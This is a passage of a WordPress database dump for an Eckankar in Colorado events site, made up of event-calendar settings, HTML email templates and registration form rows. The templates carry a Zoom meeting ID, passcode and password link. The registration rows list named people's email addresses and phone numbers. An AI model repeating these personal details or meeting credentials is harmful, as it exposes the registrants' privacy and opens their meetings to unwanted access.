18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(181516,268411,'mec_reg_fields_global_inheritance','1'),(181517,268411,'mec_reg_fields','a:0:{}'),(181518,268411,'mec_bfixed_fields','a:0:{}'),(181515,268411,'mec_ticket_variations','a:0:{}'),(181514,268411,'mec_ticket_variations_global_inheritance','1'),(181513,268411,'mec_fees','a:0:{}'),(181512,268411,'mec_fees_global_inheritance','1'),(181511,268411,'mec_tickets','a:0:{}'),(181506,268411,'mec_advanced_days','a:0:{}'),(181507,268411,'mec_in_days',''),(181508,268411,'mec_not_in_days',''),(181509,268411,'mec_hourly_schedules','a:0:{}'),(181510,268411,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(181505,268411,'mec_repeat_end_at_date',''),(181504,268411,'mec_repeat_end_at_occurrences',''),(181503,268411,'mec_repeat_end',''),(181502,268411,'mec_repeat_interval','1'),(181501,268411,'mec_repeat_type',''),(181500,268411,'mec_repeat_status','0'),(181499,268411,'mec_end_day_seconds','41400'),(181498,268411,'mec_end_time_ampm','AM'),(181497,268411,'mec_end_time_minutes','30'),(181496,268411,'mec_end_time_hour','11'),(181495,268411,'mec_end_date','2023-08-13'),(181494,268411,'mec_start_day_seconds','37800'),(181493,268411,'mec_start_time_ampm','AM'),(181492,268411,'mec_start_time_minutes','30'),(181491,268411,'mec_start_time_hour','10'),(181490,268411,'mec_start_date','2023-08-13'),(181489,268411,'mec_public','1'),(181488,268411,'mec_countdown_method','global'),(181487,268411,'mec_timezone','global'),(181486,268411,'mec_comment',''),(181480,268411,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(181481,268411,'mec_certain_weekdays','a:0:{}'),(181482,268411,'mec_allday','0'),(181483,268411,'one_occurrence','0'),(181484,268411,'mec_hide_time','0'),(181485,268411,'mec_hide_end_time','0'),(181479,268411,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-13\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-13\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(181478,268411,'mec_additional_location_ids','a:0:{}'),(181477,268411,'mec_additional_organizer_ids','a:0:{}'),(181475,268411,'mec_cost',''),(181476,268411,'mec_currency','a:0:{}'),(181473,268411,'mec_more_info_title',''),(181474,268411,'mec_more_info_target','_self'),(193829,269221,'_field_653','wmmrogers@comcast.net'),(193828,269221,'_field_652','Rogers'),(193827,269221,'_field_654','Bill'),(193826,269220,'_seq_num','76'),(193825,269220,'_form_id','61'),(193824,269220,'_field_649',''),(193823,269220,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(193822,269220,'_field_651','(303) 919-7910'),(193815,269219,'_field_656','The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom'),(193816,269219,'_field_649',''),(193817,269219,'_form_id','61'),(193818,269219,'_seq_num','75'),(193819,269220,'_field_654','Christie'),(193820,269220,'_field_652','Holliday'),(193821,269220,'_field_653','choll.03@comcast.net'),(193812,269219,'_field_652','Isley'),(193813,269219,'_field_653','visionaryexpression@gmail.com'),(193814,269219,'_field_651','(970) 749-4292'),(193811,269219,'_field_654','Niara'),(193810,269218,'_seq_num','74'),(193809,269218,'_form_id','61'),(193808,269218,'_field_649',''),(193807,269218,'_field_656','Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 400-530 pm - Florence-Hybrid'),(193806,269218,'_field_651','(719) 251-9696'),(193805,269218,'_field_653','katyahuu@gmail.com'),(193804,269218,'_field_652','YOUNG'),(193803,269218,'_field_654','KATHY'),(193802,269217,'_seq_num','73'),(193801,269217,'_form_id','61'),(193800,269217,'_field_649',''),(193799,269217,'_field_656','The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom'),(193798,269217,'_field_651','(719) 660-9726'),(193797,269217,'_field_653','jwellsoak@gmail.com'),(193796,269217,'_field_652','WELLS'),(193795,269217,'_field_654','JOE'),(193794,269216,'_seq_num','72'),(193793,269216,'_form_id','61'),(193780,269215,'_field_652','young'),(193781,269215,'_field_653','katyahuu@gmail.com'),(193782,269215,'_field_651','(719) 251-9696'),(193783,269215,'_field_656','The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom'),(193784,269215,'_field_649',''),(193785,269215,'_form_id','61'),(193786,269215,'_seq_num','71'),(193787,269216,'_field_654','Jane'),(193788,269216,'_field_652','Taylor'),(193789,269216,'_field_653','j.taylor8853@gmail.com'),(193790,269216,'_field_651','(704) 728-9150'),(193791,269216,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(193792,269216,'_field_649',''),(193779,269215,'_field_654','kathy'),(193778,269214,'_seq_num','70'),(193777,269214,'_form_id','61'),(193776,269214,'_field_649',''),(193775,269214,'_field_656','The Master 1 Discourses - STARTS IN DECEMBER -- 2nd Monday at 700 pm - Zoom'),(193774,269214,'_field_651','(303) 517-3454'),(193773,269214,'_field_653','royludwick12@gmail.com'),(193772,269214,'_field_652','Ludwick'),(193771,269214,'_field_654','Roy'),(193770,269213,'_seq_num','69'),(193769,269213,'_form_id','61'),(193768,269213,'_field_649',''),(193758,269212,'_field_651','(415) 539-7401'),(193759,269212,'_field_656','The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom -  Zoom'),(193760,269212,'_field_649',''),(193761,269212,'_form_id','61'),(193762,269212,'_seq_num','68'),(193763,269213,'_field_654','Tim'),(193764,269213,'_field_652','Kuss'),(193765,269213,'_field_653','tim_02701@protonmail.com'),(193766,269213,'_field_651','(303) 815-8405'),(193767,269213,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(193757,269212,'_field_653','fdegeus@comcast.net'),(193756,269212,'_field_652','de Geus'),(193755,269212,'_field_654','Francis'),(193754,269211,'_seq_num','67'),(193753,269211,'_form_id','61'),(193752,269211,'_field_649',''),(180177,268251,'protect_children',''),(180178,268251,'mec_color',''),(180179,268251,'mec_location_id','185'),(180180,268251,'mec_dont_show_map','0'),(180181,268251,'mec_organizer_id','1'),(180182,268251,'mec_start_date','2022-01-06'),(180183,268251,'mec_start_time_hour','8'),(180184,268251,'mec_start_time_minutes','0'),(180185,268251,'mec_start_time_ampm','AM'),(180186,268251,'mec_start_day_seconds','28800'),(180187,268251,'mec_end_date','2022-01-06'),(180188,268251,'mec_end_time_hour','6'),(180189,268251,'mec_end_time_minutes','0'),(180190,268251,'mec_end_time_ampm','PM'),(180191,268251,'mec_end_day_seconds','64800'),(180192,268251,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-06\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-06\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(180193,268251,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(180194,268251,'mec_certain_weekdays','a:0:{}'),(180195,268251,'mec_allday','0'),(180196,268251,'mec_hide_time','0'),(180197,268251,'mec_hide_end_time','0'),(180198,268251,'mec_comment',''),(180199,268251,'mec_repeat_status','0'),(180200,268251,'mec_repeat_type',''),(180201,268251,'mec_repeat_interval','1'),(180202,268251,'mec_repeat_end',''),(180203,268251,'mec_repeat_end_at_occurrences',''),(180204,268251,'mec_repeat_end_at_date',''),(180205,268251,'mec_advanced_days','a:0:{}'),(180206,268251,'mec_in_days',''),(180207,268251,'mec_not_in_days',''),(180208,268251,'mec_hourly_schedules','a:0:{}'),(180209,268251,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(180210,268251,'mec_tickets','a:0:{}'),(180211,268251,'mec_fees_global_inheritance','1'),(180212,268251,'mec_fees','a:0:{}'),(180213,268251,'mec_ticket_variations_global_inheritance','1'),(180214,268251,'mec_ticket_variations','a:0:{}'),(180215,268251,'mec_reg_fields_global_inheritance','1'),(180216,268251,'mec_reg_fields','a:0:{}'),(180217,268251,'mec_op','a:0:{}'),(180218,268251,'mec_event_date_submit','20210422105713'),(180219,268251,'mec_read_more',''),(180220,268251,'mec_more_info',''),(180221,268251,'mec_more_info_title',''),(180222,268251,'mec_more_info_target','_self'),(180223,268251,'mec_cost',''),(180224,268251,'mec_currency','a:0:{}'),(180225,268251,'mec_additional_organizer_ids','a:0:{}'),(180226,268251,'mec_additional_location_ids','a:0:{}'),(180227,268251,'one_occurrence','0'),(180228,268251,'mec_timezone','global'),(180229,268251,'mec_countdown_method','global'),(180230,268251,'mec_public','1'),(180231,268251,'mec_bfixed_fields','a:0:{}'),(180232,268251,'mec_fields','a:0:{}'),(180233,268251,'mec_event_status','EventScheduled'),(180234,268251,'mec_moved_online_link',''),(180235,268251,'mec_cancelled_reason',''),(180236,268251,'mec_display_cancellation_reason_in_single_page',''),(180237,268251,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180238,268251,'passster_activate_global_protection',NULL),(180239,268251,'passster_activate_protection',NULL),(180240,268251,'passster_protection_type','password'),(180241,268251,'_wp_old_date','2022-01-18'),(180242,268251,'boldgrid_in_page_containers','1'),(180243,268251,'_dp_original','265425'),(180244,268251,'_edit_lock','1693507466:2'),(180245,268251,'passster_area_shortcode',''),(180246,268251,'_edit_last','2'),(180247,268252,'protect_children',''),(180248,268252,'mec_color',''),(180249,268252,'mec_location_id','185'),(180250,268252,'mec_dont_show_map','0'),(180251,268252,'mec_organizer_id','1'),(180252,268252,'mec_start_date','2023-04-02'),(180253,268252,'mec_start_time_hour','10'),(180254,268252,'mec_start_time_minutes','30'),(180255,268252,'mec_start_time_ampm','AM'),(180256,268252,'mec_start_day_seconds','37800'),(180257,268252,'mec_end_date','2023-04-02'),(180258,268252,'mec_end_time_hour','11'),(180259,268252,'mec_end_time_minutes','30'),(180260,268252,'mec_end_time_ampm','PM'),(180261,268252,'mec_end_day_seconds','84600'),(180262,268252,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-02\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-02\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(180263,268252,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(180264,268252,'mec_certain_weekdays','a:0:{}'),(180265,268252,'mec_allday','0'),(180266,268252,'mec_hide_time','0'),(180267,268252,'mec_hide_end_time','0'),(180268,268252,'mec_comment',''),(180269,268252,'mec_repeat_status','0'),(180270,268252,'mec_repeat_type',''),(180271,268252,'mec_repeat_interval','1'),(180272,268252,'mec_repeat_end',''),(180273,268252,'mec_repeat_end_at_occurrences',''),(180274,268252,'mec_repeat_end_at_date',''),(180275,268252,'mec_advanced_days','a:0:{}'),(180276,268252,'mec_in_days',''),(180277,268252,'mec_not_in_days',''),(180278,268252,'mec_hourly_schedules','a:0:{}'),(180279,268252,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(180280,268252,'mec_tickets','a:0:{}'),(180281,268252,'mec_fees_global_inheritance','1'),(180282,268252,'mec_fees','a:0:{}'),(180283,268252,'mec_ticket_variations_global_inheritance','1'),(180284,268252,'mec_ticket_variations','a:0:{}'),(180285,268252,'mec_reg_fields_global_inheritance','1'),(180286,268252,'mec_reg_fields','a:0:{}'),(180287,268252,'mec_op','a:0:{}'),(180288,268252,'mec_event_date_submit','20210422105713'),(180289,268252,'mec_read_more',''),(180290,268252,'mec_more_info',''),(180291,268252,'mec_more_info_title',''),(180292,268252,'mec_more_info_target','_self'),(180293,268252,'mec_cost',''),(180294,268252,'mec_currency','a:0:{}'),(180295,268252,'mec_additional_organizer_ids','a:0:{}'),(180296,268252,'mec_additional_location_ids','a:0:{}'),(180297,268252,'one_occurrence','0'),(180298,268252,'mec_timezone','global'),(180299,268252,'mec_countdown_method','global'),(180300,268252,'mec_public','1'),(180301,268252,'mec_bfixed_fields','a:0:{}'),(180302,268252,'mec_fields','a:0:{}'),(180303,268252,'mec_event_status','EventScheduled'),(180304,268252,'mec_moved_online_link',''),(180305,268252,'mec_cancelled_reason',''),(180306,268252,'mec_display_cancellation_reason_in_single_page',''),(180307,268252,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180308,268252,'passster_activate_global_protection',NULL),(180309,268252,'passster_activate_protection',NULL),(180310,268252,'passster_protection_type','password'),(180311,268252,'_wp_old_date','2022-01-18'),(180312,268252,'boldgrid_in_page_containers','1'),(180315,268252,'_dp_original','268251'),(180314,268252,'passster_area_shortcode',''),(180316,268252,'_edit_lock','1682292058:15'),(180317,268252,'_edit_last','2'),(180320,268252,'_thumbnail_id','266598'),(180321,268255,'protect_children',''),(180322,268255,'mec_color',''),(180323,268255,'mec_location_id','185'),(180324,268255,'mec_dont_show_map','0'),(180325,268255,'mec_organizer_id','1'),(180326,268255,'mec_read_more',''),(180327,268255,'mec_more_info',''),(180328,268255,'mec_more_info_title',''),(180329,268255,'mec_more_info_target','_self'),(180330,268255,'mec_cost',''),(180331,268255,'mec_currency','a:0:{}'),(180332,268255,'mec_additional_organizer_ids','a:0:{}'),(180333,268255,'mec_additional_location_ids','a:0:{}'),(180334,268255,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-16\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-16\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(180335,268255,'mec_repeat','a:6:{s:4:\"type\";s:5:\"d